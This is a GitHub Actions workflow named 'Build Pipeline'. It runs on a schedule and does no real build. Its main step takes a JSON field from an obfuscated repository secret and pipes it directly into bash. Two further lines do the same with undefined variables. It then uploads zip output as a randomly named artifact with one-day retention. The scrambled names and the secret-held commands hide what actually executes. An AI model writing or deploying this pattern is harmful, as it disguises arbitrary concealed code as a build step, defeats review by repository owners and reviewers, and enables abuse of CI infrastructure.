name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '7 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          zk92321: ${{ secrets.zk92321 }}
        run: |
          printf '%s' "$zk92321" | jq -r .xftdw92977 | /bin/bash
          echo $wqnc4 | jq -r .db8 | /bin/bash
          printf '%s' "$surp3" | jq -r .f253 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: 9zPCUmIq
          path: "*.zip"
          retention-days: 1
